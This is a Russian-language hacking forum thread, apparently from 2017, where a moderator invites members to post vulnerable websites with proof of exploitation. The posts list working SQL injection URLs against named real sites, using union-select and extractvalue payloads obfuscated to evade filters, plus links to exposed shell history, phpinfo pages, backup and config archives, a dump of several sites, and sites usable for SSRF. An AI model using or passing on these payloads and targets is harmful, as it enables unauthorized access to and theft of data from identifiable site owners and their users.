Дата: 25/06/17 - 08:15 am   9404 Тем и 93186 Сообщений

Автор Тема: Ваши найденные уязвимости  (Прочитано 11526 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Июня 13, 2017, 03:30:29 am
Прочитано 11526 раз

BаbaDook

  • Moderator

  • Оффлайн
  • *****

  • 25
  • Reputation:
    9
    • Просмотр профиля
Предлагаю в этой  теме  выкладывать вами найденные уязвимости.
Перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. для этого достаточно в google сделать запрос : site:damagelab.in  ваш_уязвимый_сайт   
                ВАЖНО:
 1)  Пост должен содержать  уникальный сайт(нигде ране не опубликован с подобной уязвимостью)
 2)  Пост может  сопровождаться  вашими комментариями  и  куском  кода  при необходимости
 3)  Пост  должен содержать результат  эксплуатации уязвимости.  Для  sql  достаточно   будет  получить   версию, пользователя или название базы.  xss aler(); 
  4)  Если по тем или иным причинам выложить сайт не возможно, или  уязвимость носит другой  характер, ошибка   конфигурации или  бинарная  , тогда   принимаются  скрины   плюс описание  уязвимости, метода её эксплуатаци и результат.

                       
 Пример :

SQL inj
http://www.styleme.co.in/index.php?action=reviewdetail&id=26  union select GROUP_CONCAT(table_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()

Бекап

Цитировать
https://vobjem.ru/dump.sql

   
В теме запрещены  посты  не  по теме.
Старайтесь выкладывать уязвимость с кодом - это будет вам большой плюс.


« Последнее редактирование: Июня 13, 2017, 04:13:15 am от BаbaDook »
Коммерций не занимаюсь, сайты не ломаю, Эскорт услуги не оказываю. Уборка помещений, сохранение домашнего очага, готовка, выгул кошек,киднеппинг,репетиторство, стройка,ремонт, проектирование,архитектура, маникюр, педикюр,наращивание  когтей,охрана, установка https://twitter.com/big_xep

Июня 13, 2017, 05:31:28 pm
Ответ #1

BаbaDook

  • Moderator

  • Оффлайн
  • *****

  • 25
  • Reputation:
    9
    • Просмотр профиля
https://www.anti-malware.ru/.bash_history
https://www.anti-malware.ru/phpinfo.php
А казалось бы  серьёзный ресурс, около ибэ

http://доу233ржд.рф/www.zip
Качаем, открываем файл config и смотрим данные


http://www.bikesbikesbikesuk.com/list.php?catid=1+UnIon+select+111111111,(select  group_concat(0x3c62723e,table_name)+from+information_schema.tables   where table_schema=database()),3333333333333333,44444444444444444,5555555555555555,66666666666666,77777777777777,8888888888888888,999999999999+--+-

https://www.pecpodsnezkou.cz/hasici/akce-detail.php?id=1363516980+UnIon+seLect+1,2,3,GroUp_concat(0x3c62723e,TaBle_name,0x20,column_name ),5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_schema=database()

http://www.quicktrade.co.in/category_list.php?id=32+/*!50000UnIoN*/+SeLecT+1,2,3,/*!12345CoNcat*/(0x3c68313e,TabLe_name),5,6,7,8,9,10,11,12,13,14+from+/*!12345information_schema.tables*/+--+-

http://www.lambbuilding.co.uk/practice/arealist.php?id=20+ and extractvalue(0x0a,/*!12345concat*/(0x0a,(select /*!12345database*/())))--

http://www.lambbuilding.co.uk/practice/arealist.php
?id=20+ and extractvalue(0x0a,/*!12345concat*/(0x0a,(select /*!50000concat*/(/*!12345table_name*/)+/*!13337from*/+/*!50000information_schema.tables*/  limit 66,1)))--

http://unisunbd.com/page.php?cid=1&page=-522'+/*!13337UNiOn*/+seLect+1,table_name,3,4,5+from+/*!13337information_schema.tables*/limit  20,1+--+-
http://www.larrysparks.com/gallery.php?id=1'+/*!50000UnIoN*/+SeLect+user(),2,3,4+--+-
http://cart.shoppingtechnology.com/cart/affiliate-agreement.cfm
?storeid=3+ and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 1,1)))--


http://my-files.ru/qxqv6p
Дамп  нескольких сайтов
 
ssrf
http://www.1-hit.com/sniffer.htm


ssrf
http://testuri.org/sniffer



SSRF
http://www.getacert.com


SSRF
http://web-sniffer.me

Вот  сила  данной  атаки, попробуйте Nmap -p 25  web-sniffer.me
« Последнее редактирование: Июня 19, 2017, 11:59:40 pm от BаbaDook »
Коммерций не занимаюсь, сайты не ломаю, Эскорт услуги не оказываю. Уборка помещений, сохранение домашнего очага, готовка, выгул кошек,киднеппинг,репетиторство, стройка,ремонт, проектирование,архитектура, маникюр, педикюр,наращивание  когтей,охрана, установка https://twitter.com/big_xep